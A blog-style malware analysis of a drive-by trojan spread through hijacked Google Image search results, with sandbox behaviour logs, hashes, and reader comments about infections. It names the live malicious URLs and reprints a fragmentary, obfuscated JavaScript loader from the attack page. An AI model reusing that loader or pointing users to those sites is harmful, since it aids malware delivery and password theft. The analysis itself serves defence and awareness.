I wrote in the past an article about how a simple Google Image search is hijacked and lead to a fake antivirus. That fake antivirus, Windows Security was an obfuscated Java Script running in the browser and imitating the Windows Explorer but it was not able to do any harms other than irritating the users with repeated fake alerts pop-ups. Of course the solution to solve these false computer infections is offered and this is to download and install another rogue program AntiSpyWareSetup.exe.
You don’t need a lot of online experience to realize that by installing the rogue software your system will be infected for real and maybe compromised because once a trojan virus is inside the operating system it will open the “gates” for another myriad of viruses. However multiple steps are involved until the computer of an innocent user will become infected: he must click “Remove all infections” button–this button is a kind of download link, he must download the rogue program described above and he must install it. Unless this innocent user is a child, I think nobody can falls into this trap.
But yesterday somebody told me about another Google Images search that can lead to a computer infection without user intervention: simply clicking on an image in the first Google Image results page, the user is redirected to a malware domain where a Java executable is automatically downloaded and executed, a specific drive-by attack. This new trojan virus seems to be a much more serious problem, as it seems to be interested by the browser saved passwords and once it is installed in the computer, immediately it connects to an IP address.
Let’s start with the beginning. Yesterday, who was searching in Google Image for Presley Walker pics and click the first image from the results was redirected and automatically infected if not the proper defense software was in place.
The whole URL taken from the browser address bar was :
http://www.google.fi/imgres?imgurl=http://media1.englishbaby.com/dynamic/my_photo/image/0000/0000/0582/582849_1207016226_560070.jpg&imgrefurl=http://meble-zach.laohost.net/presley-walker%26page%3D2&usg=__i5h8m160Hg_MBAENC0bFErNk8Ic=&h=400&w=324&sz=27&hl=fi&start=1&zoom=1&tbnid
=xVO3e4u_qm5S-M:&tbnh=124&tbnw=100&ei=pSyqTZScOpKq8APi0YC5Ag&prev=/search%3Fq%3DPresley%2BWalker%26hl%3Dfi%26client%3Daff-cs-worldbrowser%26hs%3DcYv%26sa%3DX%26biw%3D1924%26bih%3D838%26tbm%3Disch%26prmd%3Divns&itbs=1
redirecting to:
http://likestop.info/TF19
which is the malicious domain containing the malware.
Fortunately, today this Google Image search is not hijacked anymore the redirect does not act anymore because Google repair the things, but the virus is still present at the mentioned URL.
An excerpt of the source of the web page at http://likestop.info/TF19 is below. It’s in fact a blank page sometimes showing a little square but with a Java Script running in the background. It looks like a truly black hat:
<html lang=”en” dir=”ltr”>
<head><meta name=”description” content=”Careers: Take your career to new heights with little help from the experts. From getting ahead, to honing effective work habits, to getting along better with your boss, our career.” />
<meta name=”category” scheme=”DMINSTR2″ content=”Careers & Work” />
<meta name=”pagetype” scheme=”DMINSTR2″ content=”category” />
<meta name=”wa_lr” scheme=”DMINSTR2″ content=”en-US” />
<meta name=”studioid” scheme=”DMINSTR2″ content=”” />
<meta name=”contentid” scheme=”DMINSTR2″ content=”” />
<meta name=”subcategory” scheme=”DMINSTR2″ content=”” /><meta name=”subsubcat” scheme=”DMINSTR2″ content=”” />
<meta name=”siteid” scheme=”DMINSTR2″ content=”EHWC” />
<meta name=”exp_name” scheme=”DMINSTR2″ content=”Rebuild” />
<meta name=”exp_page” scheme=”DMINSTR2″ content=”Rebuild-TestGroup” />
<meta name=”wa_un” scheme=”DMINSTR2″ content=”” /><meta name=”wa_isreg” scheme=”DMINSTR2″ content=”” />
<meta name=”wa_lgdin” scheme=”DMINSTR2″ content=”” />
<meta name=”wa_clvl” scheme=”DMINSTR2″ content=”1″ />
<meta name=”wa_lgsrc” scheme=”DMINSTR2″ content=”1″ /><meta name=”description” content=”7+ GB of storage, less spam, and mobile access. Gmail is email that’s intuitive, efficient, and useful. And maybe even fun.”>
ico” href=”//mail.google.com/favicon.ico”>
<style type=text/css>
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin:1em 0;}
h1 { font-size:1.3em; font-weight:normal; margin:0 0 0.4em; }
.intro { margin:0 1em 0.5em 0 }
.c {width: 4; height: 0}
.footer { text-align:center; margin:1em 0 }.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}.caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center}
.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}
.feature-image {padding: 15px 0 0 0; width:48px; vertical-align: top; text-align: right; }
.feature-description {padding: 20px 0 0 10px; vertical-align: top; text-align: left; }
.signup_btn {cursor: pointer; margin: 10px 0 -20px 0; text-align: center; }
.signup_btn_link {color: #000; text-align: center; text-align: center; text-decoration: none; padding: 0 7px; font-weight: bold; font-size: 14px; white-space: nowrap; }</style>
<title>
Gmail: Email from Google
</title>
<style type=”text/css”>
body { font-size: smaller; }
</style>
<meta name=”description” content=”High-end mechanical keyboard providing outstanding tactile feedback. If you like the , is for you. Pure typing joy defined.”/>
programer keyboard, geek keyboard, high quality keyboard, cherry, mx module, mx keys switch, mx blue key switch, mx brown key swith, mx black key switche, clicky keyboard, geek elite high quality pc keyboard, mechanical keyswitch, mechanical key switch, clicky keyboard, quality, USB, geek, tactile keyboard, geek gift, geek chic, nerd gift” />
<script>
try {
window.moniker = function(s){};}
catch (e) {}
function inte()
{
Call();
}xm_ahvoei_=dmocbakawj;var sb$fslxcos=””;var f$hquvn8f_=’1′;var cdjdq4ukd_=’charAt’;var ml0q3mxtom=’length’;var d2qsjrnhyk=’abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPRST’;var yqaabr5zvl=’roxioa_is’;var iwi_itam7k=’getElementById’;var vcswsdxstu=255;var bx$yj9$qne=256;var s$f6d9galv=4;var f1zf7s4y9o=5;var kxfj888i0w=20;var ja7wbjzpx2=65280;z8nd16f_jl=(function(e22$dib2dy,kvfu0pbrmi){return e22$dib2dy[kvfu0pbrmi];});var uz$alispdu=bx$yj9$qne;var x4rg4cofy0=100;var xn$zidhnq8=8;var fs3cxxd_lw=s$f6d9galv;var bgsciwrjjw=f1zf7s4y9o;var ak2alag120=0;var wxdoqs$0b9=1;var uq119ea145=4000;var dg$xhobxn1=kxfj888i0w;var fsk_dwkhvx=ja7wbjzpx2;function dmocbakawj(){var ll52d8ex_4=parseInt(k5gst7fbh$(‘roxioa_sk’));var damdm90hya=sb$fslxcos;for(var part=-x4rg4cofy0;partuq119ea145){isk=wxdoqs$0b9}}return ss;}function decodeHex(str){var result=[];var nextchar=sb$fslxcos;for(var i=ak2alag120;i>xn$zidhnq8;c2=code&vcswsdxstu;result[‘push’](String.fromCharCode(c1,c2));nextchar=sb$fslxcos}}return result[‘join’](sb$fslxcos);}function ipau2lhdtv(r5wbf2legb){return document[iwi_itam7k](r5wbf2legb);}function base_decode(num,alphabet){alphabet=d2qsjrnhyk;var len=num.length;var decoded=ak2alag120;var multi=wxdoqs$0b9;for(var i=len- wxdoqs$0b9;i>=ak2alag120;i– ){decoded=decoded+multi*alphabet.indexOf(num[cdjdq4ukd_](i));multi=multi*alphabet[ml0q3mxtom]}return decoded;}function k5gst7fbh$(i9$dq66uq_){return i4oy29bj_j(ipau2lhdtv(i9$dq66uq_),wecrta73a4);}
try{
document.stupid();
}
catch(e){
}</script>
</head>
I have navigated to this malicious site using a sandboxed browser(Firefox running inside Sandboxie) and I was able to track the changes to the system performed by this drive-by attack, them are presented below.
As a warning, please keep in mind that even if you run the browser or another trojan virus in a sandbox, it still can connect to the hackers servers and send the stolen data so if you are not careful enough you will finish with the computer clean of viruses because of the sandbox but with online accounts stolen, it’s not a happy end for you.
[ Changes to filesystem ]
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\cookies.sqlite
* Creates file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\cookies.sqlite-journal
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\localstore.rdf
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\places.sqlite
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\pluginreg.dat
* Modifies file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\prefs.js
* Creates file C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\sessionstore.js
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\17\7560f91-16655272
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\17\7560f91-16655272.idx
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\42\3bbc156a-3d1d62b5
* Creates file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\cache\6.0\42\3bbc156a-3d1d62b5.idx
* Modifies file C:\Documents and Settings\Administrator\Application Data\Sun\Java\Deployment\deployment.properties
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Mozilla Firefox\updates\0\update.mar
* Creates file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\915F59E7d01
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_001_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_002_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\Cache\_CACHE_MAP_
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\rvpotxk5.default\XUL.mfl
* Modifies file C:\Documents and Settings\Administrator\Local Settings\Temp\afurladvisor.log
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temp\v1wd1flc.exe[ Changes to registry ]
* Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}
* Modifies value “Name=java.exe” in key HKEY_CURRENT_USER\software\Microsoft\Direct3D\MostRecentApplication
old value “Name=FLVPlayer.exe”
* Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox[ Network services ]
* Connects to “66.235.180.91” on port 80.[ Process/window information ]
* Keylogger functionality.
* Creates a mutex “MSCTF.Shared.MUTEX.IPB”.
* Creates an event named “MSCTF.SendReceive.Event.IPB.IC”.
* Creates an event named “MSCTF.SendReceiveConection.Event.IPB.IC”.
* Creates a mutex “jvmStart”.
* Opens a service named “JavaQuickStarterService”.
* Creates process “(null),”C:\Program Files\Java\jre6\bin\java.exe” -D__jvm_launched=109833283237 -Xbootclasspath/a:C:\PROGRA~1\Java\jre6\lib\deploy.jar;C:\PROGRA~1\Java\jre6\lib\javaws.jar;C:\PROGRA~1\Java\jre6\lib\plugin.jar -Djava.class.path=C:\PROGRA~1\Java\jre6\classes -Dsun.awt.warmup=true sun.plugin2.main.client.PluginMain write_pipe_name=jpi2_pid3260_pipe2,read_pipe_name=jpi2_pid3260_pipe1,(null)”.
* Creates a mutex “CTF.LBES.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.Compart.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.Asm.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.Layouts.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.TMD.MutexDefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “CTF.TimListCache.FMPDefaultS-1-5-21-839522115-261903793-1417001333-500MUTEX.DefaultS-1-5-21-839522115-261903793-1417001333-500”.
* Creates a mutex “DDrawWindowListMutex”.
* Creates a mutex “__DDrawExclMode__”.
* Creates a mutex “__DDrawCheckExclMode__”.
* Creates an event named “jpi2_pid3260_evt3”.
* Creates process “(null),C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\v1wd1flc.exe,(null)“.
Just by involuntary visiting this website, a malware is dropped in the temporary %temp% directory but an interesting fact, visiting the site twice, the name and the MD5 hash of the malware is slightly modified, though the size is the same 7.62 KB. In the first case it was :
1dk8pu5p.exe MD5: C438EF1371451CC4CE47CE854595FABC
and at the second visit:
v1wd1flc.exe MD5: FC2580B1FC0152785513ECC6B99C9461
These random names and the modified MD5 hashes makes more difficult the antivirus task to recognize this virus trojan. Performing a scan at virustotal.com results that only 5 from 41 antiviruses detect this virus and two of them only as suspicious, it has not yet a name, that’s why I called it the TF19 virus. Another fact, this virus tries to make a connection over the Internet and transfer the Firefox Profile folder where are stored all the saved passwords, the history of navigation and other kind of sensitive data. The chances are good that also more malware will be downloaded onto the computer, resulting a keylogged computer found at the discretion of the hacker–a zombie computer.
Also we can see from the Sandboxie analysis (performed with BSA add-on) that the virus uses Java engine to do his nefarious actions.
From curiosity, I had performed a Google search for TF19 trojan virus and it came up with a virustotal.com report for another TF19 domain:
http://bluewiki.info/TF19
The virustotal.com sentence for this site was 100% clean site , despite the user comments from the scan result page that fired an warning about a virus infection resulted from visiting the address mentioned.
The same 100% clean site is the report for our analyzed site: http://likestop.info/TF19 . Very, very bad for the users.
Another result of a Google search for TF19 virus is at Dr.Web Anti-virus site, there a connection is made with a trojan virus named by Avira TR/Spy.Bancos.TF.19 used by hackers to steal online banking accounts, emails accounts and other sensitive data aswell.
It’s a good thing that Google react very quickly to these kind of threats but the mode how this virus finds its way to infect our computers without user interaction, just by clicking an image remind us how important is to run a reputed Internet Security Suite always up-to-date. Even so, we have no guarantee that we will stay clean of viruses but that is all what depends of us: to update our antivirus and the operating system with the latest security patches.
Hmmm, seeing infection methods like this one, I hate to say it but we need also a bit of luck to avoid an infection.
Keep safe !
this is sadly old news – got infected twice this way earlier this year. it wasn’t easy to recover either as the virus prevented anything from any program being started, including task manager – the second time it even reloaded itself while the computer was in safe mode. microsoft security essentials didn’t do a thing to stop it and their india-based help desk provided no help. finally was able to stop it by doing a restore back to before it was loaded up – the dormant files were still there until essentials finally upgraded their software to see it. still get hits from the same virus every now and then on google images, but at least essentials stops it now.
Found several variations in the appearance of the “virus checker” part in about a dozen images (googling myself). I was immediately alerted as it was diagnosing Windows viruses and trojans that could not possibly be affecting my Unix-like system. If I was running Windows, I might have fallen for it.
So far as I can see, Google’s only advice is “Install Chrome.” How convenient that Google images are infected with redirects and the only cure seems to be the browser Google is promoting! Very convenient.
@ Lars thats interesting they would tell you to use Chrome. I get the “less bad” google image reroutes all the time on chrome. I wonder how these viruses get on your computer in the first place to cause you to be re routed. Also seems like they could steal your information without having to **** up your computer. I understand Google being the most popular search engine they are going to be targeted (then again I can’t say this doesn’t happen on the others :)) but they should be able to counter these attacks a lot faster this is getting ridiculous. Trust me yahoo!\bing\ask are curse words in my home, but never say never.
My computer seems to have been infected by this virus, I had to interactions with the fake prompts for scan my computer, but my virus detection software only detected its presence for a few minutes, then after 2 full scans the computer seemed clean. I shut down the computer, and in the morning I started it up again, but the PC won’t progress start-up passed the ‘Samsung’ Loading screen. Even running basic recovery did nothing.
The trojan came through even using Google Chrome! Does anyone have any advice in this case?
I have gotten hit every time I have just clicked on a Google pic the last couple weeks. My AVG catches it but I had to use other malware removers to completely remove it. I had to start in safe mode and restore back a couple days.
I am having trouble with Google Images search window popping up when I try to do an image search on another browser. I have to start all over again with my search and cannot search Yahoo! images or any other image search for that matter. I have tried and tried to find information, did a boot time scan with Avast!, a scan with Malbytesware, Hjack This!, Combofix, and nothing was found. It doesn’t do this on my laptop, but is also doing this on my iPad now with Safari. Can’t figure out why it is doing this.
When I do an Image search on another browser, any browser, the image search redirects to Google Images every time. Now it is doing it on my iPad. Here is the code from the link from Chrome, on this website link -http://search.yahoo.com/search;_ylt=A0oGdWJLC5hQ9S0A7uhXNyoA;_ylc=X1MDMjc2NjY3OQRfcgMyBGFvA2FvBGNzcmNwdmlkA2hENERLRW9HZFRCNjQ3NVdVSmU5M0F4cEdIVEN2bENZRGFrQUNSSEMEZnIDY3JtYXMEZnIyA3NidG4Ebl9ncHMDMTAEb3JpZ2luA3NycARwcXN0cgNjYXRzBHF1ZXJ5A2NhdHMEc2FvAzEEdnRlc3RpZANBQ0JZMDM-?p=cats&fr2=sb-top&fr=crmas&vf=all&pqstr=cats
When I right-click the link and copy it, here is what I get. When you click on it it takes you to Google Images, and the search has to be started over again.
Cats – Image Results